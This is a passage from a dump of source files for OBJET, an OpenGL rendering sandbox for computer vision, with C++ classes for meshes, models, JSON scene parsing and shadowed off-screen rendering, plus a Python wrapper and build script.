\"shaders/fragment_shader.glsl\"\n ;\n\nstd::string shadowVertexShader =\n#include \"shaders/shadow_vertex_shader.glsl\"\n ;\n\nstd::string shadowFragmentShader =\n#include \"shaders/shadow_fragment_shader.glsl\"\n ;\n" }, { "alpha_fraction": 0.6804261207580566, "alphanum_fraction": 0.6804261207580566, "avg_line_length": 18.256410598754883, "blob_id": 
"e5b962be0fe0677a21260b53efc3ba7f4da5a82f", "content_id": "a32375275e56fc537f0b7aefeadedbb86a39b946", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 751, "license_type": "permissive", "max_line_length": 66, "num_lines": 39, "path": "/inc/object.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <string>\n#include <fstream>\n#include <sstream>\n#include <vector>\n\n#include <GL/glew.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n#include <assimp/Importer.hpp>\n#include <assimp/scene.h>\n#include <assimp/postprocess.h>\n\n#include \"data.h\"\n#include \"mesh.h\"\n#include \"shader.h\"\n\nclass Object\n{\npublic:\n /* Data */\n const std::string name;\n std::vector<Mesh> meshes;\n data::ObjectData* objectData;\n\n /* Functions */\n Object(const char* pathToObjectJSON, const std::string &name);\n\n void draw(Shader* shader) const;\n\nprivate:\n /* Functions */\n void processNode(aiNode *node, const aiScene *scene);\n\n Mesh processMesh(aiMesh *mesh, const aiScene *scene);\n};\n" }, { "alpha_fraction": 0.6385669112205505, "alphanum_fraction": 0.6417281627655029, "avg_line_length": 26.114286422729492, "blob_id": "c0b03fe68faac30cafe2770740afd39e3a8715d1", "content_id": "387f2a79e89312bb91b4005a39015c961cf422cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "permissive", "max_line_length": 61, "num_lines": 35, "path": "/setup.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "import subprocess\n\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\nversion = '1.0'\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nclass ObjetBuild(build_ext):\n def run(self, ):\n subprocess.check_call(['make', 'python'])\n build_ext.run(self)\n\nsetup(\n name='pyobjet',\n version=version,\n author='Mahan Fathi',\n author_email='[email protected]',\n description=\"OBJET: A Computer Vision Graphical Sandbox\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/MahanFathi/OBJET\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n ],\n install_requires=['numpy'],\n packages=['pyobjet'],\n package_data={'': [\"_OBJET.so\"]},\n cmdclass=dict(build_ext=ObjetBuild),\n zip_safe=False,\n)\n" }, { "alpha_fraction": 0.6841848492622375, "alphanum_fraction": 0.6998047232627869, "avg_line_length": 30.352041244506836, "blob_id": "73b1a3b29a176cb81aac6d7d6d4d3044a63aea61", "content_id": "fb060c3cb1520f78d71847f265dbab6c3f030012", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6146, "license_type": "permissive", "max_line_length": 126, "num_lines": 196, "path": "/OBJET.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"OBJET.h\"\n\n#include <FreeImage.h>\n\n#include \"glsls.h\"\n#include \"util.h\"\n\nOBJET::OBJET(std::string pathToMetaJSON, int width, int height):\n width(width), height(height), shadowWidth(3 * width), shadowHeight(3 * height)\n{\n InitOpenGL();\n InitShaders();\n model = new Model(pathToMetaJSON.c_str());\n}\n\n\nvoid OBJET::Draw()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n\n shadowShader->use();\n 
model->setShadow(shadowShader);\n glViewport(0, 0, shadowWidth, shadowHeight);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFramebuffer);\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n model->draw(shadowShader);\n\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n glViewport(0, 0, width, height);\n glClearColor(0.55f, 0.77, 0.85f, 1.0f);\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n\n objectShader->use();\n model->setEnvironment(objectShader);\n objectShader->setUniform(\"shadowMap\", 0);\n\n glActiveTexture(GL_TEXTURE0);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n\n model->draw(objectShader);\n\n glFlush();\n}\n\n\nstd::vector<float> OBJET::GetDepthMap()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // Make the FLOAT array\n GLfloat* pixels = new GLfloat[width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT, pixels);\n\n std::vector<float> image;\n float near = model->metaData->cameraPerspectiveNearPlane;\n float far = model->metaData->cameraPerspectiveFarPlane;\n for (int i = 0; i < width * height; i++) {\n float z = 2.0f * pixels[i] - 1.0f;\n z = (2.0 * near * far) / (far + near - z * (far - near));\n image.push_back(z);\n }\n\n return image;\n}\n\n\nstd::vector<int> OBJET::GetImage()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // Make the BYTE array\n GLubyte* pixels = new GLubyte[3 * width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_RGB, GL_UNSIGNED_BYTE, pixels);\n\n std::vector<int> image;\n for (int i = 0; i < 3 * width * height; i++)\n image.push_back(static_cast<int>(pixels[i]));\n\n return image;\n}\n\n\nvoid OBJET::ToImage(std::string pathToImage)\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n\n // Make the BYTE array\n GLubyte* pixels = new GLubyte[3 * width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_BGR_EXT, GL_UNSIGNED_BYTE, pixels);\n\n FIBITMAP* image = FreeImage_ConvertFromRawBits(pixels, width, height, 3 * width, 24, 0x0000FF, 0xFF0000, 0x00FF00, false);\n FreeImage_Save(FIF_PNG, image, pathToImage.c_str(), 0);\n FreeImage_Unload(image);\n delete [] pixels;\n}\n\n\nvoid OBJET::SetCamera(std::vector<float> position, std::vector<float> target)\n{\n model->setCamera(position, target);\n}\n\n\nvoid OBJET::SetObjectPosition(std::string objectName, std::vector<float> position)\n{\n model->setObjectPosition(objectName, position);\n}\n\n\nvoid OBJET::SetObjectYRotation(std::string objectName, float yRotation)\n{\n model->setObjectYRotation(objectName, yRotation);\n}\n\n\nvoid OBJET::SetObjectScale(std::string objectName, float scale)\n{\n model->setObjectScale(objectName, scale);\n}\n\n\nvoid OBJET::InitOpenGL()\n{\n // init GLFW\n glfwInit();\n glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3);\n glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3);\n glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\n // create a window\n window = glfwCreateWindow(width, height, \"OBJET\", NULL, NULL);\n glfwMakeContextCurrent(window);\n glfwHideWindow(window);\n\n GLenum err = glewInit();\n if (err != GLEW_OK)\n exit(1);\n\n // hide and caputure the cursor\n glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED);\n\n // rendering window size\n glViewport(0, 0, width, height);\n\n // assign callback functions\n glfwSetFramebufferSizeCallback(window, framebuffer_size_callback);\n\n // run depth check (Z-buffer)\n glEnable(GL_DEPTH_TEST);\n\n /* Reder 
FrameBuffer */ // off-screen rendering\n // weird stuff happens in i3 for example when rendering to\n // the main buffer, the desktop manager messes with window\n glGenFramebuffers(1, &renderFramebuffer);\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // color attachment texture\n unsigned int textureColorbuffer;\n glGenTextures(1, &textureColorbuffer);\n glBindTexture(GL_TEXTURE_2D, textureColorbuffer);\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGB, GL_UNSIGNED_BYTE, NULL);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR);\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, textureColorbuffer, 0);\n // renderbuffer object\n unsigned int rbo;\n glGenRenderbuffers(1, &rbo);\n glBindRenderbuffer(GL_RENDERBUFFER, rbo);\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH24_STENCIL8, width, height);\n glFramebufferRenderbuffer(GL_FRAMEBUFFER, GL_DEPTH_STENCIL_ATTACHMENT, GL_RENDERBUFFER, rbo);\n\n /* Depth Map FrameBuffer */ // for shadowing\n glGenFramebuffers(1, &depthMapFramebuffer);\n glGenTextures(1, &depthMap);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, shadowWidth, shadowHeight,\n 0, GL_DEPTH_COMPONENT, GL_FLOAT, NULL);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFramebuffer);\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, depthMap, 0);\n glDrawBuffer(GL_NONE); glReadBuffer(GL_NONE);\n\n}\n\n\nvoid OBJET::InitShaders()\n{\n objectShader = new Shader(objectVertexShader, objectFragmentShader);\n shadowShader = new Shader(shadowVertexShader, shadowFragmentShader);\n}\n\n" }, { "alpha_fraction": 0.6232127547264099, "alphanum_fraction": 0.6307821869850159, "avg_line_length": 28.725000381469727, "blob_id": "206be7db509a54f41b5a337a36008834235598b8", "content_id": "87ac45215be36e7193a736c3acd7ac26e8d704b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "permissive", "max_line_length": 65, "num_lines": 40, "path": "/pyobjet/objet.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "from .OBJET import OBJET\n\nimport numpy as np\n\nclass Objet(object):\n \"\"\"OBJET\"\"\"\n\n def __init__(self, path_to_meta_json, width=500, height=500):\n self._OBJET = OBJET(path_to_meta_json, width, height)\n\n self.width = width\n self.height = height\n\n def draw(self, ):\n self._OBJET.Draw()\n\n def get_image(self, ):\n img = np.array(self._OBJET.GetImage())\n img = img.reshape([self.height, self.width, -1])\n return np.flip(img, axis=0)\n\n def get_depth_map(self, ):\n img = np.array(self._OBJET.GetDepthMap())\n img = img.reshape([self.height, self.width])\n return np.flip(img, axis=0)\n\n def to_image(self, path_to_image):\n self._OBJET.ToImage(path_to_image)\n\n def set_camera(self, position, target):\n self._OBJET.SetCamera(position, target)\n\n def set_object_position(self, object_name, position):\n self._OBJET.SetObjectPosition(object_name, position)\n\n def set_object_y_rotation(self, object_name, y_rotation):\n self._OBJET.SetObjectYRotation(object_name, y_rotation)\n\n def set_object_scale(self, 
object_name, scale):\n self._OBJET.SetObjectScale(object_name, scale)\n" }, { "alpha_fraction": 0.6228868365287781, "alphanum_fraction": 0.6254876255989075, "avg_line_length": 15.361701965332031, "blob_id": "a1570b5b68956cae5bc56eaff5df13ef6a0dfb62", "content_id": "aa807243188b5ee20f6d8cc32791db987b6721f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 769, "license_type": "permissive", "max_line_length": 88, "num_lines": 47, "path": "/inc/mesh.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <string>\n#include <fstream>\n#include <sstream>\n#include <vector>\n\n#include <GL/glew.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n\n#include \"shader.h\"\n\nstruct Vertex {\n glm::vec3 Position;\n glm::vec3 Normal;\n};\n\nstruct Texture {\n unsigned int id;\n std::string type;\n std::string path;\n};\n\n\nclass Mesh {\npublic:\n /* Mesh Data */\n std::vector<Vertex> vertices;\n std::vector<unsigned int> indices;\n GLuint VAO;\n\n /* Functions */\n Mesh(const std::vector<Vertex> &vertices, const std::vector<unsigned int> &indices);\n ~Mesh();\n void draw(Shader* shader) const;\n\n\nprivate:\n /* Render data */\n GLuint VBO, EBO;\n\n /* Functions */\n void setupMesh();\n};\n" }, { "alpha_fraction": 0.5755102038383484, "alphanum_fraction": 0.6530612111091614, "avg_line_length": 26.22222137451172, "blob_id": "9ee984fd4fda0de815d2a706e2160f7083eea72b", "content_id": "942dce20223e8f099a2d365fe099640f3fbcb428", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 245, "license_type": "permissive", "max_line_length": 53, "num_lines": 9, "path": "/src/common.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <glm/glm.hpp>\n#include \"common.h\"\n\n\n// cam settings\nfloat deltaTime = 0.0f;\nglm::vec3 cameraPos = glm::vec3(7.0f, 4.0f, 7.0f);\nglm::vec3 cameraFront = glm::normalize(-cameraPos);\nglm::vec3 cameraUp = glm::vec3(0.0f, 1.0f, 0.0f);\n" }, { "alpha_fraction": 0.7668161392211914, "alphanum_fraction": 0.7713004350662231, "avg_line_length": 21.299999237060547, "blob_id": "2d24052682ee7d9e09e5d8bb32f9de5fc724a44a", "content_id": "66d091b6e9981e7e77944974f7c2060eb6bd90d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 223, "license_type": "permissive", "max_line_length": 74, "num_lines": 10, "path": "/inc/util.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <GLFW/glfw3.h>\n\n\nvoid framebuffer_size_callback(GLFWwindow* window, int width, int height);\n\nvoid processInput(GLFWwindow *window);\n\nvoid mouse_callback(GLFWwindow* window, double xpos, double ypos);\n" }, { "alpha_fraction": 0.6376944184303284, "alphanum_fraction": 0.6557639241218567, "avg_line_length": 30.22857093811035, "blob_id": "2d847fd8ceeac288027d6653f8bed55e54d59edf", "content_id": "8194de1d35a060ff551f55806872e0e34b2fe9df", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4372, "license_type": "permissive", "max_line_length": 112, "num_lines": 140, "path": "/src/model.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"model.h\"\n\nModel::Model(const char* pathToMetaJSON)\n{\n metaData = new data::MetaData(pathToMetaJSON);\n for (unsigned int i = 0; i < metaData->objectCount; i++) {\n 
std::string pathToObjectJSON = metaData->objectJSONPaths[i];\n std::string objectName = metaData->objectNames[i];\n objects.push_back(Object(pathToObjectJSON.c_str(), objectName));\n }\n}\n\n\nvoid Model::setEnvironment(Shader* shader)\n{\n setShadow(shader);\n setCamera(shader);\n setLightProperties(shader);\n}\n\n\nvoid Model::draw(Shader* shader)\n{\n for(unsigned int i = 0; i < objects.size(); i++) {\n setTransformations(shader, i);\n objects[i].draw(shader);\n }\n}\n\n\nvoid Model::setLightProperties(Shader* shader)\n{\n // directional lighting\n shader->setUniform(\"directionalLight.direction\", glm::normalize(metaData->directionalLightDirection));\n shader->setUniform(\"directionalLight.color\", metaData->directionalLightColor);\n\n // point lighting\n shader->setUniform(\"pointLightCount\", metaData->pointLightCount);\n for(unsigned int i = 0; i < metaData->pointLightCount; i++) {\n shader->setUniform(\"pointLights[\" + std::to_string(i) + \"].position\", metaData->pointLightPositions[i]);\n shader->setUniform(\"pointLights[\" + std::to_string(i) + \"].color\", metaData->pointLightColors[i]);\n }\n}\n\n\nvoid Model::setTransformations(Shader* shader, const unsigned int &objectNum)\n{\n // scale and rotate\n glm::mat4 rotation = glm::mat4(1.0f);\n rotation = glm::rotate(rotation, metaData->objectYRotations[objectNum], glm::vec3(0.0f, 1.0f, 0.0f));\n rotation = glm::scale(rotation, metaData->objectScales[objectNum] * glm::vec3(1.0f, 1.0f, 1.0f));\n shader->setUniform(\"transform\", rotation);\n\n // translate\n glm::mat4 translate = glm::mat4(1.0f);\n translate = glm::translate(translate, metaData->objectTranslations[objectNum]);\n shader->setUniform(\"model\", translate);\n\n}\n\n\nvoid Model::setCamera(Shader* shader)\n{\n glm::vec3 cameraUp = glm::vec3(0.0f, 1.0f, 0.0);\n glm::mat4 view = glm::lookAt(\n metaData->cameraPosition,\n -metaData->cameraPosition + metaData->cameraTarget,\n cameraUp);\n shader->setUniform(\"view\", view);\n\n glm::mat4 projection = glm::mat4(1.0f);\n projection = glm::perspective(glm::radians(metaData->cameraFieldOfView), 1.0f, // FIXME: aspect ratio\n metaData->cameraPerspectiveNearPlane,\n metaData->cameraPerspectiveFarPlane);\n shader->setUniform(\"projection\", projection);\n}\n\n\nvoid Model::setShadow(Shader* shader)\n{\n float scale = 10;\n float bound = 30.0f, near_plane = 5.0f, far_plane = 20.0f;\n glm::mat4 lightProjection = glm::ortho(-bound, bound, -bound, bound, near_plane, far_plane);\n glm::mat4 lightView = glm::lookAt(-scale * glm::normalize(metaData->directionalLightDirection),\n glm::vec3( 0.0f, 0.0f, 0.0f), glm::vec3( 0.0f, 1.0f, 0.0f));\n glm::mat4 lightSpaceMatrix = lightProjection * lightView;\n shader->setUniform(\"lightSpaceMatrix\", lightSpaceMatrix);\n}\n\n\nunsigned Model::objectNameToIndex(const std::string &objectName) const\n{\n std::ptrdiff_t pos = distance(\n metaData->objectNames.begin(),\n find(metaData->objectNames.begin(),\n metaData->objectNames.end(),\n objectName)\n );\n return unsigned(pos);\n}\n\n\nvoid Model::setCamera(const std::vector<float> &position, const std::vector<float> &target)\n{\n metaData->cameraPosition = glm::vec3(\n position[0],\n position[1],\n position[2]\n );\n metaData->cameraTarget = glm::vec3(\n target[0],\n target[1],\n target[2]\n );\n}\n\n\nvoid Model::setObjectPosition(const std::string &objectName, const std::vector<float> &position)\n{\n unsigned index = objectNameToIndex(objectName);\n metaData->objectTranslations[index] = glm::vec3(\n position[0],\n position[1],\n position[2]\n 
);\n}\n\n\nvoid Model::setObjectYRotation(const std::string &objectName, const float &yRotation)\n{\n    unsigned index = objectNameToIndex(objectName);\n    metaData->objectYRotations[index] = yRotation;\n}\n\n\nvoid Model::setObjectScale(const std::string &objectName, const float &scale)\n{\n    unsigned index = objectNameToIndex(objectName);\n    metaData->objectScales[index] = scale;\n}\n" }, { "alpha_fraction": 0.7081748843193054, "alphanum_fraction": 0.7081748843193054, "avg_line_length": 29.941177368164062, "blob_id": "967876a0e5614af7362243fbc3acdca6dcd07436", "content_id": "bd6f59c579e9787c617ba98a7c63177f5f52485d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 96, "num_lines": 34, "path": "/inc/model.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <vector>\n\n#include \"data.h\"\n#include \"object.h\"\n#include \"shader.h\"\n\n\nclass Model\n{\npublic:\n    /* Data */\n    data::MetaData* metaData;\n    std::vector<Object> objects; // a model is a collection of objects, e.g. the room and the items in it\n\n    /* Functions */\n    Model(const char *pathToMetaJSON);\n    void setShadow(Shader* shader);\n    void setEnvironment(Shader* shader);\n    void draw(Shader* shader);\n    void setCamera(const std::vector<float> &position, const std::vector<float> &target);\n    void setObjectPosition(const std::string &objectName, const std::vector<float> &position);\n    void setObjectYRotation(const std::string &objectName, const float &yRotation);\n    void setObjectScale(const std::string &objectName, const float &scale);\n\nprivate:\n    /* Functions */\n    void setTransformations(Shader* shader, const unsigned int &objectNum);\n    void setLightProperties(Shader* shader);\n    void setCamera(Shader* shader);\n    unsigned objectNameToIndex(const std::string &objectName) const;\n};\n" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6086956262588501, "avg_line_length": 14.333333015441895, "blob_id": "cb8d0eef37e63bb0d419ff4c9e123b6db0a5d9c8", "content_id": "80acb0ba6275bce65f5bca9bac2dc72de42ab599", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/pyobjet/__init__.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "from .objet import Objet\n\n__all__ = [\"Objet\"]\n" }, { "alpha_fraction": 0.6869118809700012, "alphanum_fraction": 0.6937553286552429, "avg_line_length": 19.875, "blob_id": "a417555d344078c7baeb3d7b3271750ec04515ce", "content_id": "a4b8eb60cc5f03cf758803ea6abba46fe13bb271", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 53, "num_lines": 56, "path": "/inc/data.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <vector>\n#include <rapidjson/document.h>\n#include <glm/glm.hpp>\n\n\nrapidjson::Document readJSON(const char *pathToJSON);\n\nnamespace data {\n\nclass MetaData\n{\npublic:\n    /* Data */\n    // objects\n    int objectCount;\n    std::vector<std::string> objectNames;\n    std::vector<std::string> objectJSONPaths;\n    std::vector<glm::vec3> objectTranslations;\n    std::vector<float> objectYRotations;\n    std::vector<float> objectScales;\n    // camera\n    glm::vec3 cameraPosition;\n    glm::vec3 cameraTarget;\n    float 
cameraFieldOfView;\n    float cameraPerspectiveNearPlane;\n    float cameraPerspectiveFarPlane;\n    // lighting\n    int pointLightCount;\n    std::vector<glm::vec3> pointLightPositions;\n    std::vector<glm::vec3> pointLightColors;\n    glm::vec3 directionalLightDirection;\n    glm::vec3 directionalLightColor;\n\n    /* Functions */\n    MetaData(const char *pathToModelJSON);\n\n};\n\nclass ObjectData\n{\npublic:\n    /* Data */\n    std::string objPath;\n    glm::vec3 color;\n    float ambientStrength;\n    float diffuseStrength;\n    float specularStrength;\n\n    /* Functions */\n    ObjectData(const char *pathToObjectJSON);\n};\n\n}\n" }, { "alpha_fraction": 0.626556932926178, "alphanum_fraction": 0.6367882490158081, "avg_line_length": 39.87272644042969, "blob_id": "0fa5d6ed5862b991f232d7693b0b052c1bf6c1ee", "content_id": "d98e5f1ae6a6456c742bb6381cf9d8dea26137f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4496, "license_type": "permissive", "max_line_length": 99, "num_lines": 110, "path": "/src/data.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n\n#include \"data.h\"\n\n\ndata::MetaData::MetaData(const char *pathToMetaJSON) {\n    rapidjson::Document metaJSON = readJSON(pathToMetaJSON);\n\n    rapidjson::Value& objects = metaJSON[\"objects\"];\n    objectCount = objects.Size();\n\n    /* parse the data into objects */\n    for (rapidjson::SizeType i = 0; i < objectCount; i++) {\n        // get strings\n        objectNames.push_back(objects[i][\"name\"].GetString());\n        objectJSONPaths.push_back(objects[i][\"path_to_json\"].GetString());\n        // get scales, rotations, and translations\n        float objectScale = objects[i][\"scale\"].GetFloat();\n        objectScales.push_back(objectScale);\n        float objectYRotation = objects[i][\"rotation_y\"].GetFloat();\n        objectYRotations.push_back(objectYRotation);\n        float translation_x = objects[i][\"translation\"][\"x\"].GetFloat();\n        float translation_y = objects[i][\"translation\"][\"y\"].GetFloat();\n        float translation_z = objects[i][\"translation\"][\"z\"].GetFloat();\n        objectTranslations.push_back(\n            glm::vec3(translation_x, translation_y, translation_z)\n        );\n    }\n\n    rapidjson::Value& pointLights = metaJSON[\"lighting\"][\"point_lights\"];\n    pointLightCount = pointLights.Size();\n\n    /* parse the data into pointLights */\n    for (rapidjson::SizeType i = 0; i < pointLightCount; i++) {\n        // get position\n        float position_x = pointLights[i][\"position\"][\"x\"].GetFloat();\n        float position_y = pointLights[i][\"position\"][\"y\"].GetFloat();\n        float position_z = pointLights[i][\"position\"][\"z\"].GetFloat();\n        pointLightPositions.push_back(\n            glm::vec3(position_x, position_y, position_z)\n        );\n        // get color\n        float color_r = float(pointLights[i][\"color\"][\"r\"].GetInt()) / 255.0f;\n        float color_g = float(pointLights[i][\"color\"][\"g\"].GetInt()) / 255.0f;\n        float color_b = float(pointLights[i][\"color\"][\"b\"].GetInt()) / 255.0f;\n        pointLightColors.push_back(\n            glm::vec3(color_r, color_g, color_b)\n        );\n    }\n\n    /* parse the data into directionalLight */\n    rapidjson::Value& directionalLight = metaJSON[\"lighting\"][\"directional_light\"];\n    float direction_x = directionalLight[\"direction\"][\"x\"].GetFloat();\n    float direction_y = directionalLight[\"direction\"][\"y\"].GetFloat();\n    float direction_z = directionalLight[\"direction\"][\"z\"].GetFloat();\n    directionalLightDirection = glm::vec3(\n        direction_x, direction_y, direction_z\n    );\n    float color_r = float(directionalLight[\"color\"][\"r\"].GetInt()) / 
255.0f;\n    float color_g = float(directionalLight[\"color\"][\"g\"].GetInt()) / 255.0f;\n    float color_b = float(directionalLight[\"color\"][\"b\"].GetInt()) / 255.0f;\n    directionalLightColor = glm::vec3(\n        color_r, color_g, color_b\n    );\n\n    /* parse the data into camera */\n    rapidjson::Value& camera = metaJSON[\"camera\"];\n    float position_x = camera[\"position\"][\"x\"].GetFloat();\n    float position_y = camera[\"position\"][\"y\"].GetFloat();\n    float position_z = camera[\"position\"][\"z\"].GetFloat();\n    cameraPosition = glm::vec3(\n        position_x, position_y, position_z\n    );\n    float target_x = camera[\"target\"][\"x\"].GetFloat();\n    float target_y = camera[\"target\"][\"y\"].GetFloat();\n    float target_z = camera[\"target\"][\"z\"].GetFloat();\n    cameraTarget = glm::vec3(\n        target_x, target_y, target_z\n    );\n    cameraFieldOfView = camera[\"perspective\"][\"field_of_view\"].GetFloat();\n    cameraPerspectiveNearPlane = camera[\"perspective\"][\"near_plane\"].GetFloat();\n    cameraPerspectiveFarPlane = camera[\"perspective\"][\"far_plane\"].GetFloat();\n}\n\n\ndata::ObjectData::ObjectData(const char *pathToObjectJSON) {\n    rapidjson::Document objJSON = readJSON(pathToObjectJSON);\n\n    objPath = objJSON[\"path_to_obj\"].GetString();\n    color = glm::vec3(\n        float(objJSON[\"color\"][\"r\"].GetInt()) / 255.0f,\n        float(objJSON[\"color\"][\"g\"].GetInt()) / 255.0f,\n        float(objJSON[\"color\"][\"b\"].GetInt()) / 255.0f\n    );\n    ambientStrength = objJSON[\"ambient_strength\"].GetFloat();\n    diffuseStrength = objJSON[\"diffuse_strength\"].GetFloat();\n    specularStrength = objJSON[\"specular_strength\"].GetFloat();\n}\n\n\nrapidjson::Document readJSON(const char *pathToJSON) {\n    std::ifstream jsonFile(pathToJSON);\n    std::string json((std::istreambuf_iterator<char>(jsonFile)), std::istreambuf_iterator<char>());\n\n    rapidjson::Document jsonDoc;\n    jsonDoc.Parse(json.c_str());\n\n    return jsonDoc;\n}\n" }, { "alpha_fraction": 0.640595018863678, "alphanum_fraction": 0.6607485413551331, "avg_line_length": 30.202898025512695, "blob_id": "28c8a9af89b70c2ff610ef0cad3e62f946d62fa1", "content_id": "8f28f3cd0926940f251d4d09d31c60076a6d50ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4168, "license_type": "permissive", "max_line_length": 92, "num_lines": 138, "path": "/main.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <math.h>\n\n#include <GL/glew.h>\n#include <GLFW/glfw3.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n#include <glm/gtc/type_ptr.hpp>\n\n#include <string>\n#include <fstream>\n#include <streambuf>\n\n#include \"model.h\"\n#include \"shader.h\"\n#include \"util.h\"\n#include \"common.h\"\n#include \"glsls.h\"\n\n\nint main()\n{\n    // init GLFW\n    glfwInit();\n    glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3);\n    glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3);\n    glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\n    const unsigned int width = 500, height = 500;\n\n    // create a window\n    GLFWwindow* window = glfwCreateWindow(width, height, \"OBJET\", NULL, NULL);\n    if (window == NULL)\n    {\n        std::cout << \"Failed to create GLFW window\" << std::endl;\n        glfwTerminate();\n        return -1;\n    }\n    glfwMakeContextCurrent(window);\n\n    GLenum err = glewInit();\n    if (err != GLEW_OK)\n        exit(1);\n\n    // hide and capture the cursor\n    glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED);\n\n    // rendering window size\n    glViewport(0, 0, width, height);\n\n    // assign callback functions\n    
